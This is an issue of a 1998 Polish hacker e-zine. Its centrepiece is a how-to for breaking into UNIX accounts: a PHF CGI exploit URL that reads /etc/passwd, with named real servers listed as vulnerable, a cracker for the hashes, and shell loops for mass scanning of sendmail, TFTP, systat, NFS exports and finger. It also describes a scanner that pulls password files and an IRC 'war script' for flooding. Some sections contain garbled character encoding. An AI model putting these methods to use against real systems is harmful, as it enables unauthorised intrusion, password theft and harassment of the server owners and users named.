| | ---- ---- | / |--- |---\ /---\ |\ /| /--\ /----- | | | | | | | / | | | | | \ / | / \ | |----| |----| | |\ |-- |---/ \---\ | \/ | |----| | --\ | | | | | | | \ | | \ | | | | | | | | | | | ---- | \ |--- | \ \---/ | | | | \----/ ============================================================================= Numer:03 z czerwca 1998 http://www.kki.net.pl/hackers ============================================================================= Spis tresci: 1.Spis tresci 2.Wstep 3.Hacker Start 4.Zdobywanie wielu kont. 5.Skrypt! 6.Unix - polecenia cz.2 7.Linki do ciekawych stron 8.Redakcja ----------------------------------------------------------------------------- Wstep: Cos jakos tak ten mag wychodzi co 2 miesiace, choc powinien co miesiac. Do tego numeru dolacze program opisywany w poprzednim numerze - "Kaboom!" . Cos sie z nasza strona www dzieje, moze nawet za pol roku bedzie mozna uznac ja za skonczona :) . W tym numerze bedzie duzo o UNIX-ie. Kontakt przez email: hackers@kki.net.pl Richgyver ps. Napiszcie czy wolicie wersje tekstowa czy html-owska wersje maga! ----------------------------------------------------------------------------- "Hacker Start": Opisze tutaj dosc znany sposob wyciagniecia pliku passwd z katalogu etc w systemach UNIX przez przegladarke internetowa z serverow podlaczonych do internetu. Znajdujemy jakis serwer (komputer podlaczony bezposrednio do internetu) a nastepnie wpisujemy w pole adresu: http://xxxx.xxxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd ^^^^^^^^^^^^^ tu adres servera W tedy w przegladarce pojawi nam sie caly plik passwd, gdzie sa zapisane hasla wszystkich uzytkownikow danego systemu. Oczywiscie sa one zaszyfrowane. Rozszyfrowac je mozna programikiem o nazwie "Cracker Jack". Ta metoda dziala juz na bardzo niewielu serwerach unixowych. W polsce ta metoda dziala na: http://www.radio.opole.com.pl http://www.perytnet.pl Richgyver ----------------------------------------------------------------------------- ZDOBYWANIE WIELU KONT: czesc 1: Tworzenie listy serwerow i wstepne zbieranie informacji... Zaczne od tego, ze pisze ten artykul tylko po to, aby inni uzytkownicy wiedzieli, ze mozliwe jest latwe zdobycie ich konta UNIXowego. ============================================================================= OK., jest to pierwsza czesc mojego artykulu na temat hackowania kont UNIXowych, wiec chcialbym napisac co wogole bedzie mozna tu znalezc. Wiec tak, zamierzam opisac metody zdobywania adresow serwerow i wyszukiwania tych slabo zabezpieczonych, dalej metody chodzenia wokol systemu, zdobywania informacji o jego slabych punktach, ktore mozna wykorzystac do wlamania. Nastepnie kilka metod dostania sie do takiego serwera. Czytanie pliku /etc/shadow z poziomu "szarego" uzytkownika, zdobywanie dalszych kont po wlamaniu sie na serwer ( konie trojanskie, poszukiwanie bledow w konfiguracji, itp. ). Moze bedzie cos jeszcze ( jesli mnie natchnie, lub znajde cos ciekawego w sieci :) ============================================================================ To zaczynam: Najlatwiejszym sposobem wlamania sie do systemu jest wyszukanie sobie kilku najslabiej zabezpieczonych serwerow i testowanie roznych metod wlasnie na nich. Jest to tez chyba najbezpieczniejsze, gdyz zakladam, ze skoro serwer jest slabo zabezpieczony, to jest rowniez slabo monitorowany, co daje nam rowniez wieksze bezpieczenstwo. Jak wyszukac sobie takie serwery? Otoz jest to bardzo proste. Podam tu dwie najprostsze chyba metody: 1. Uruchamiamy wyszukiwarke internetowa ( np. www.wow.pl ), wybieramy interesujacy nas dzial serwerow ( polecam edukacja/ szkoly, uczelnie, organizacje studenckie i tym podobny shit :) Gdy pojawi sie spis serwerow zapisujemy go na dysk. Kiedys wszystkie dzialy WOWa byly na plytce WWW ( np. "WWW" sierpien 1997, mozna wiec zrobic to off-line oszczedzajac kase ). Dalej wycinamy adresy serwerow ( recznie lub przy uzyciu jakiegos programiku np. UrlCut, ktory dolaczam [ jest to wersja 0.01 napisana w 15 min., wiec posiada duzo bledow, ale obiecuje je wkrotce poprawic ] ). Majac juz liste serwerow ( jeden pod drugim ) mozemy rozpoczac scanning... 2. Druga metoda to sciagniecie gotowej listy serwerow z: ftp.rs.internic.net ( sa tam: com.zone.gz, edu.zone.gz, gov.zone.gz, org.zone.gz, root.zone.gz i inne ). Polecam edu lub org, jako najslabiej zabezpieczone. Odradzam natomiast "zabawe" z gov.zone.gz ( szczegolnie poczatkujacym hackerom ). Po zrzuceniu pliki te nalezy rozpakowac ( $ gzip -d edu.zone.gz lub pod WIN95 WinZip 6.3 [ moze inne tez] ). Dalej znow trzeba recznie odzielic adresy od reszty danych ( mozna uzyc programiku getdomain napisanego w perlu [ uruchamiamy go: $ perl getdomain.pl edu.zone edu>lista ,lub dla org $ perl getdomain.pl org.zone org>lista i analogicznie inne ]). W najblizszym czasie postaram sie napisac podobne narzedzie pod DOSa. 3. Mozna tez wykorzystac liste serwerow, ktora dodaje do artykulow jest ona uzyskana wlasnie z WOW i obrobiona programikiem UrlCut. Dobra mamy juz liste serwerow. Teraz nalezaloby oddzielic ziarna od plew. Zaczynamy od wstepnego przejrzenia podstawowych dziur... W tej czesci podam jedynie jak zdobywac rozne dane, w czesci nastepnej postaram sie przedstawic wam ich analize i doczego moga nam sie przydac zdobyte informacje. a) SENDMAIL: Zacznijmy moze od sprawdzenia wersji sendmaila na serwerze. $ telnet adres.serwera.ofiary 25 powinno pojawic sie cos takiego: ...adres.serwera.edu.pl Sendmail 8.6.12/8.6.12 ready at... Aby zrobic to automatycznie mozna uzyc programu SMSCAN, uruchamiajac go ze stworzona wczesniej lista serwerow ( najpierw kompilujemy i zamieniamy nazwe :) $ gcc smscan.c $ mv a.out SMSCAN i uruchamiamy: $ ./SMSCAN lista>plik.z.wersjami.sendmaili& Trwa to dosc dlugo, wiec najlepiej robic to albo noca, albo polaczyc sie z jakims serwerem udostepniajacym konta UNIXowe zrzucic tam SMSCAN i liste serwerow do sprawdzenia a po uruchomieniu ( zostawic proces w tle& lub nohup ) i wylogowac sie. Wyniki mozna obejrzec wtedy np. nastepnego dnia. Spisujemy numery wersji Sendmail'i ( potem nam sie przydadza ). b) TFTP ( Trivial File Transfer Protocol ). Sprawdzamy, czy serwery maja zaistalowanego klienta tftp: $ telnet adres.serwera.ofiary 69 Jesli sie polaczy - notujemy to sobie, jesli nie - szukamy dalej. Dzis juz bardzo trudno znalezc serwer odpowiadajacy na takie zawolanie. Najczesciej zobaczycie napis: telnet: Unable to connect to remote host: Connection refused Mozna tez napisac script, ktory bedzie to robil za nas. W najprostszej formie wygladalby tak: $ cat script.tftp telnet www.adres1.edu.pl 69 telnet www.adres2.edu.pl 69 telnet www.adres3.edu.pl 69 Tak robilem na poczatku, gdy jeszcze nie umialem napisac bardziej skomplikowanego, lecz uniwersalnego scriptu. Teraz wyglada on w ten sposob: $ cat script.tftp #!/bin/sh for serwer in `cat $1` do telnet $serwer 69 done $ :) Uruchamiamy: $ ./script.tftp lista.serwerow>raport.tftp Przegladajac 'raport.tftp' wyszukujemy z jakimi serwerami polaczenie sie powiodlo. Notujemy to sobie. c) SYSTAT i NETSTAT. Wykonujemy te same czynnosci, co powyzej, lecz zamiast portu 69 odpowiadajacego za TFTP podajemy 11 (systat) a nastepnie 15 (netstat). Sprawdzamy czy otrzymujemy odpowiedz z serwera ( czy porty te sa aktywne ). Jesli tak: $ telnet www.adres.serwera 11>raport.systat& Powinienes otrzymac liste procesow na serwerze ( tak jakbys wydal komende ps -auwwx ), nie majac nawet na nim konta. $ telnet www.adres.serwera 15>raport.netstat& Zwroci Ci liste aktywnych portow serwera. d) NFS, czyli Network File System. Jest to chyba najfajniejsza rzecz jaka wymyslono. Admini ciagle maja problemy z konfiguracja pliku /etc/exports. Tworzymy wiec podobny script, z tym, ze zamiast telnetu wpisujemy " showmount -e ". ----- wytnij tu ------ #!/bin/sh for serwer in `cat $1` do showmount -e $serwer done ----- wytnij tu ------ Na wiekszosci systemow potrzeba do tego roota. # script.mount lista.serwerow>raport.mount& Jednak juz w Red Hat Linux 5.00 moze to zrobic kazdy uzytkownik ( a taki system jest wlasnie na dom.vr.pl, gdzie mozna sobie zalozyc darmowe konto ). % script.mount lista.serwerow>raport.mount& ;) e) FINGER. Jest to rowniez bardzo pozyteczne narzedzie. Szczegolnie w wydaniu: $ finger -l @www.adres.serwera Zwroci nam to dane na temat pracujacych w systemie uzytkownikow. Przydatne jest to szczegolnie przy probie dostania sie do systemu poprzez odgadniecie hasla. Znow tworzymy script, aby miec te informacje uwiecznione ( do pozniejszej analizy ). f) WWWBOARD. O wwwboard bedzie wlasciwie pozniej, ale warto jest sie zorientowac, czy serwer udostepnia takie uslugi ;) $ lynx Teraz naciskamy liere "g" i wpisujemy adres serwera: URL to open: http://www.adres.serwera/wwwboard/wwwboard.html Jesli odnajdzie szukana strone, notujemy. Nie - szukamy dalej. [ Na temat hackowania wwwboard'a napisze w kolejnych czesciach artykulu ] g) WS_FTP. Bardzo trudno jest dzis znalezc plik WS_FTP.INI z aktualnym wpisem, ale jesli Ci sie to uda to koniecznie zapisz to sobie. Jak go znalezc? Najlepiej polaczyc sie z serwerem za pomoca anonimowego ftp i szukac :) Gdy znajdziemy, to: ftp> get WS_FTP.INI [ Szerzej na temat WS_FTP napisze w dalszych czesciach artykulu ] h) Dziury w scriptach CGI-BIN w starszych HTTPD. Pod katem tego typu dziur mozna przeszukiwac serwery wykorzystujac program ( a raczej kilka scriptow ) XENOLITH i wczesniej stworzona liste. Do artykulu zalaczam script z tego pakietu o nazwie monk.sh Uzycie: $ ./monk.sh lista.serwerow Podczas skanowania tworzy on pliki o nazwie powstalej z adresu serwera, w ktorych zapisuje sciagniety plik z haslami ( pod warunkiem, ze go sciagnie, co dzis nie jest juz takie proste :( W celu przeskanowania pojedynczego serwera korzystam ze swietnego programiku o nazwie Vito. Dolacze go do nastepnego artykulu, w ktorym dokladniej opisze te dziury. ============================================================================= OK. tyle na dzisiaj. Wiecej w nastepnym numerze, w ktorym postaram sie wytlumaczyc wam w jaki sposob interpretowac zdobyte informacje, oraz jak z nich korzystac. ============================================================================= ArktH ps. Pozdrowienia dla: KeenU'a, Sir D, BoBo, 3stan'a i pozostalych. " Nil mortalibus ardui (e)st... " - Horacy mail: arkth@friko4.onet.pl flames: /dev/null ----------------------------------------------------------------------------- Skrypt!: Jak to mawia│ kiedy£ pan Japa WITKA (kto nie rozumie to nie zrozumie).W ka┐dym b╣dƒ razie to znowu JA. Hmmm znowu kazali mi cos napisaµ ale nie powiedzieli co. Uwazam ze ka┐dy z was ma mIRC-a (internet realy chat) ale je£li nie to za│╣czam go tutaj. Jego instalacja jest banalna wiec nie bΩdΩ jej opisywal. Mo┐e nie raz bΩd╣c na ircu us│yszeli£cie cos o skryptach czy to wojennych obronnych czy mo┐e uniwersalnych. W│a£nie to o nich chce powiedzieµ co nieco. Niekt≤rych stron mo┐ecie £ci╣gn╣µ jakiego£ scrypta np. http://www.7thsphere.com/sphere/files/sphere.exe i jest on jednym z lepszych scryptow wojennych. Jest on w pliku zip lub wersji instalacyjnej. Po £ci╣gniΩciu rozpakujcie go do katalogu w kt≤rym macie zainstalowanego Mirca. Po w│╣czeniu mo┐e pojawiµ siΩ k│opot z setupem. Wpiszcie co tam chc╣ a je£li bΩdziecie mieli k│opocik to po prostu trzeba wcisn╣µ cancel. I w│a£ciwie to wszystko je£li chodzi o instalacje. Po w│╣czeniu musicie od pocz╣tku wpisaµ swoje dane i kana│ ircowy. Zaraz po po│╣czeniu zobaczycie zmiany. Po pierwsze pojawi│y siΩ dƒwiΩki. Wszystko wy£wietlane jest w oknach. W pasku opcji pojawi│a siΩ nowa 7sphere. Jest tam wiele opcji m.in. mo┐na ustawiµ sobie ochronΩ r≤┐nego rodzaju np. przed floodem. Mo┐emy zapisywaµ logi by potem sobie poczytaµ lub sprawdziµ co kto m≤wi│. Wa┐n╣ opcj╣ jest przej£cie do War Menu. Mamy wtedy dostΩp do kilku program≤w do banowania, floodowania i r≤┐nych takich:):):):):)(r)Du┐o opcji jest dostΩpnych dopiero gdy mamy opa (operator kana│u). Lukas ----------------------------------------------------------------------------- Unix - polecenia czesc II : Zdobywanie informacji o innych u┐ytkownikach: -Sprawdƒ co u┐ytkownik robi - w "nazwa_u┐ytkownika" -Sprawdƒ co u┐ytkownik ostatnio robi│ - lastcomm "nazwa_uzytkownika" -Sprawdƒ porΩ zalogowania siΩ/wylogowania - last "nazwa_u┐ytkownika" -Wy£wietlanie praw dostΩpu w katalogu macierzystym u┐ytkownika - ls -ld ~"nazwa u┐ytkownika" Prawa dostΩpu do plik≤w i katalog≤w w UNIX: -Sprawdƒ prawa dostΩpu do pliku - ls -l nazwa_pliku -Sprawdƒ prawa dostΩpu do katalogu - ls -ld nazwa_pliku -Sprawdƒ prawa dostΩpu w swoim katalogu macierzystym - ls -ld ~"twoja_nazwa_u┐ytkownika" Prawa dostΩpu (lewa czΩ£µ wykazu) bΩd╣ podane nastΩpuj╣co: -rxw-------- 2 aaron 512 Feb 17 08:14 nazwa_pliku gdzie symbole maj╣ nastΩpuj╣ce znaczenie: d - katalog rwx (pierwsze) - prawa dostΩpu dla u┐ytkownika (Ciebie) rwx (drugie) - prawa dostΩpu dla cz│onk≤w twojej grupy rwx (trzecie) - prawa dostΩpu dla innych (pozosta│ych) w ka┐dej kategorii -u┐ytkownik cz│onkowie_grupy inni Symbol oznacza: R - zezwolenie na odczyt (kopiowanie, wy£wietlanie, £ci╣ganie) W - zezwolenie na zapis (zmiana nazwy, modyfikowanie, kasowanie) X - zezwolenie na uruchomienie pliku - - brak danego zezwolenia Prawa dostΩpu mo┐esz zmieniµ poleceniem CHMOD. Trzeba w nim wskazaµ kategoriΩ (u- u┐ytkownik, g- cz│onkowie grupy, o- inni,) oraz kt≤re zezwolenie (rwx) ma byµ w│╣czone (+) lub wy│╣czone (-) Parametry mog╣ byµ kombinowane np. Chmod o-rw nazwa_uzytkownika - wy│╣czy zezwolenie na zapis i na odczyt dla innych Chmod u+x nazwa_uzytkownika - w│╣czy zezwolenie na uruchamianie dla u┐ytkownika Lukas ----------------------------------------------------------------------------- Linki do interesujacycg stron: -strony zwiazane z h/p/c/v/a -http://www.kki.net.pl/hackers -http://www.inet.com.pl/rafal -http://hack.netpol.pl -http://kki.net.pl/glider -http://www.kki.net.pl/~masher Twoja strona tez moze znalezc sie w tym spisie. Musisz najpierw: 1. Umiescic ten "kawalek" kodu html na swojej stronie: <-- Poczatek odnosnika do hackersmag --> <-- Koniec odnosnika --> 2. Napisac do nas email (zadresowany do hackers@kki.net.pl) z informacja o adresie twojej strony. Jesli wszystko zrobiles poprawnie twoja strona zostanie umieszczona w naszym spisie najciekawszych stron. ----------------------------------------------------------------------------- W sklad redakcja tego maga wchodza: -Richgyver (hackers@kki.net.pl) -Lukas (chopin@friko.onet.pl) -ArtktH (arkth@friko4.onet.pl) Jesli chcial cos napisac do naszego maga (a nam to sie by spodobalo) lub napisales juz jakis tekst to wyslij to na adres: hackers@kki.net.pl ze swoimi danymi. Kazdy taki piszacy do naszego maga dostanie wynagrodzenie (pieniadze). Zawsze wszystkie numery poprzednie oraz najnowszy numer naszego magazynu mozesz sciagnac ze strony: http://www.kki.net.pl/hackers Mozesz do nas napisac list, nasz email: hackers@kki.net.pl Wszystkie materialy i informacje zawarte sa tu jedynie w celach *EDUKACYJNYCH* i nikt z redakcji nie ponosi *ZADNEJ* odpowiedzialnosci, za zle wykorzystanie podanych tu informacji... /Koniec pliku tekstowego./